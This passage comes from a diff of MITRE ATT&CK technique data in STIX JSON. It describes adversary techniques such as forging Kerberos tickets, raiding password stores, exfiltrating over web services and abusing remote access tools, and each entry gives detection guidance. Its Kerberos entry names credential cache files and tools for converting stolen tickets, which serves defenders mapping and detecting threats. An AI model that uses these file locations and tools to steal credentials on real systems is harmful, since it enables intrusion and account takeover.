CVE-2016-6662 Detail. Retrieved April 3, 2018.", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6662" + }, + { + "source_name": "NVD CVE-2014-7169", + "description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7169" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "OWASP Top 10", + "description": "OWASP. (2018, February 23). OWASP Top Ten Project. Retrieved April 3, 2018.", + "url": "https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project" + }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T16:58:02.395Z", + "name": "Steal or Forge Kerberos Tickets", + "description": "Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.\n\nOn Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)\n\nLinux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the \"ccache\". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)\n\n\nKerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tim (Wadhwa-)Brown", + "Cody Thomas, SpecterOps" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)\n\nMonitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. \n\nEnable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)\n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.\n\nMonitor for unusual processes accessing secrets.ldb and .secrets.mkey located in /var/lib/sss/secrets/.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Kerberos authentication enabled" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3fc01293-ef5e-41c6-86ce-61f10706b64a", + "created": "2020-02-11T19:12:46.830Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1558", + "external_id": "T1558" + }, + { + "source_name": "CERT-EU Golden Ticket Protection", + "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", + "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf" + }, + { + "source_name": "Microsoft Detecting Kerberoasting Feb 2018", + "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", + "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/" + }, + { + "source_name": "Kekeo", + "description": "Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.", + "url": "https://github.com/gentilkiwi/kekeo" + }, + { + "source_name": "SpectorOps Bifrost Kerberos macOS 2019", + "description": "Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost. Retrieved October 6, 2021.", + "url": "https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f" + }, + { + "source_name": "Medium Detecting Attempts to Steal Passwords from Memory", + "description": "French, D. (2018, October 2). Detecting Attempts to Steal Passwords from Memory. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea" + }, + { + "source_name": "Stealthbits Detect PtT 2019", + "description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.", + "url": "https://blog.stealthbits.com/detect-pass-the-ticket-attacks" + }, + { + "source_name": "macOS kerberos framework MIT", + "description": "Massachusetts Institute of Technology. (2007, October 27). Kerberos for Macintosh Preferences Documentation. Retrieved October 6, 2021.", + "url": "http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html" + }, + { + "source_name": "MIT ccache", + "description": "Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.", + "url": "https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html" + }, + { + "source_name": "AdSecurity Cracking Kerberos Dec 2015", + "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", + "url": "https://adsecurity.org/?p=2293" + }, + { + "source_name": "ADSecurity Detecting Forged Tickets", + "description": "Metcalf, S. (2015, May 03). Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?p=1515" + }, + { + "source_name": "Microsoft Kerberos Golden Ticket", + "description": "Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.", + "url": "https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285" + }, + { + "source_name": "Microsoft Klist", + "description": "Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.", + "url": "https://docs.microsoft.com/windows-server/administration/windows-commands/klist" + }, + { + "source_name": "ADSecurity Kerberos Ring Decoder", + "description": "Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s Secret Decoder Ring. Retrieved February 27, 2020.", + "url": "https://adsecurity.org/?p=227" + }, + { + "source_name": "Brining MimiKatz to Unix", + "description": "Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing Mimikatz et al to UNIX. Retrieved October 13, 2021.", + "url": "https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf" + }, + { + "source_name": "Linux Kerberos Tickets", + "description": "Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red Teams. Retrieved October 4, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-26T14:19:09.417Z", + "name": "Credentials from Password Stores", + "description": "Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "IaaS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "created": "2020-02-11T18:48:28.456Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1555", + "external_id": "T1555" + }, + { + "source_name": "F-Secure The Dukes", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-05T15:00:36.471Z", + "name": "Exfiltration Over Web Service", + "description": "Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.\n\nWeb service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "William Cain" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "created": "2020-03-09T12:51:45.570Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1567", + "external_id": "T1567" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-12T23:52:30.489Z", + "name": "Remote Access Software", + "description": "An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)\n\nRemote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.\n \nAdversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.\n\nInstallation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Matt Kelly, @breakersall", + "Zachary Stanford, @svch0st", + "Dray Agha, @Purp1eW0lf, Huntress Labs" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.\n\n[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "2.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1219", + "external_id": "T1219" + }, + { + "source_name": "CrowdStrike 2015 Global Threat Report", + "description": "CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf" + }, + { + "source_name": "CrySyS Blog TeamSpy", + "description": "CrySyS Lab. (2013, March 20). TeamSpy – Obshie manevri. Ispolzovat’ tolko s razreshenija S-a. Retrieved April 11, 2018.", + "url": "https://blog.crysys.hu/2013/03/teamspy/" + }, + { + "source_name": "Google Chrome Remote Desktop", + "description": "Google. (n.d.). Retrieved March 14, 2024.", + "url": "https://support.google.com/chrome/answer/1649523" + }, + { + "source_name": "Chrome Remote Desktop", + "description": "Huntress. (n.d.). Retrieved March 14, 2024.", + "url": "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708" + }, + { + "source_name": "Symantec Living off the Land", + "description": "Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.", + "url": "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:04.582Z", + "name": "Unauthorized Command Message", + "description": "Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nIn the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process/Event Alarm", + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0855", + "external_id": "T0855" + }, + { + "source_name": "Benjamin Freed March 2019", + "description": "Benjamin Freed 2019, March 13 Tornado sirens in Dallas suburbs deactivated after being hacked and set off Retrieved. 2020/11/06 ", + "url": "https://statescoop.com/tornado-sirens-in-dallas-suburbs-deactivated-after-being-hacked-and-set-off/" + }, + { + "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011", + "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ", + "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258" + }, + { + "source_name": "Zack Whittaker April 2017", + "description": "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", + "url": "https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-28T15:55:55.068Z", + "name": "Domains", + "description": "Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute \"IDN homograph attacks,\" creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)\n\nDifferent URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)\n\nAdversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Wes Hurd", + "Vinayak Wadhwa, Lucideus", + "Deloitte Threat Library Team", + "Oleg Kolesnikov, Securonix", + "Menachem Goldstein", + "Nikola Kovac" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--40f5caa0-4cb7-4117-89fc-d421bb493df3", + "created": "2020-09-30T17:09:31.878Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/001", + "external_id": "T1583.001" + }, + { + "source_name": "URI Unique", + "description": "Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.", + "url": "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF" + }, + { + "source_name": "PaypalScam", + "description": "Bob Sullivan. (2000, July 24). PayPal alert! Beware the 'PaypaI' scam. Retrieved March 2, 2017.", + "url": "https://www.zdnet.com/article/paypal-alert-beware-the-paypai-scam-5000109103/" + }, + { + "source_name": "CISA IDN ST05-016", + "description": "CISA. (2019, September 27). Security Tip (ST05-016): Understanding Internationalized Domain Names. Retrieved October 20, 2020.", + "url": "https://us-cert.cisa.gov/ncas/tips/ST05-016" + }, + { + "source_name": "CISA MSS Sep 2020", + "description": "CISA. (2020, September 14). Alert (AA20-258A): Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity. Retrieved October 1, 2020.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-258a" + }, + { + "source_name": "bypass_webproxy_filtering", + "description": "Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019.", + "url": "https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "Domain_Steal_CC", + "description": "Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.", + "url": "https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/" + }, + { + "source_name": "tt_obliqueRAT", + "description": "Malhotra, A., McKay, K. et al. (2021, May 13). Transparent Tribe APT expands its Windows malware arsenal . Retrieved July 29, 2022.", + "url": "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html" + }, + { + "source_name": "tt_httrack_fake_domains", + "description": "Malhotra, A., Thattil, J. et al. (2022, March 29). Transparent Tribe campaign uses new bespoke malware to target Indian government officials . Retrieved September 6, 2022.", + "url": "https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + }, + { + "source_name": "Categorisation_not_boundary", + "description": "MDSec Research. (2017, July). Categorisation is not a Security Boundary. Retrieved September 20, 2019.", + "url": "https://www.mdsec.co.uk/2017/07/categorisation-is-not-a-security-boundary/" + }, + { + "source_name": "URI", + "description": "Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.", + "url": "https://www.techtarget.com/searchsecurity/tip/Preparing-for-uniform-resource-identifier-URI-exploits" + }, + { + "source_name": "Redirectors_Domain_Fronting", + "description": "Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.", + "url": "https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/" + }, + { + "source_name": "URI Use", + "description": "Nathan McFeters. Billy Kim Rios. Rob Carter.. (2008). URI Use and Abuse. Retrieved February 9, 2024.", + "url": "https://www.blackhat.com/presentations/bh-dc-08/McFeters-Rios-Carter/Presentation/bh-dc-08-mcfeters-rios-carter.pdf" + }, + { + "source_name": "iOS URL Scheme", + "description": "Ostorlab. (n.d.). iOS URL Scheme Hijacking. Retrieved February 9, 2024.", + "url": "https://docs.ostorlab.co/kb/IPA_URL_SCHEME_HIJACKING/index.html" + }, + { + "source_name": "lazgroup_idn_phishing", + "description": "RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.", + "url": "https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/" + }, + { + "source_name": "httrack_unhcr", + "description": "RISKIQ. (2022, March 15). RiskIQ Threat Intelligence Roundup: Campaigns Targeting Ukraine and Global Malware Infrastructure. Retrieved July 29, 2022.", + "url": "https://web.archive.org/web/20220527112908/https://www.riskiq.com/blog/labs/ukraine-malware-infrastructure/" + }, + { + "source_name": "ThreatConnect Infrastructure Dec 2020", + "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", + "url": "https://threatconnect.com/blog/infrastructure-research-hunting/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Archive via Library", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.\n\nConsider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6", + "created": "2020-02-20T21:08:52.529Z", + "created_by_ref": 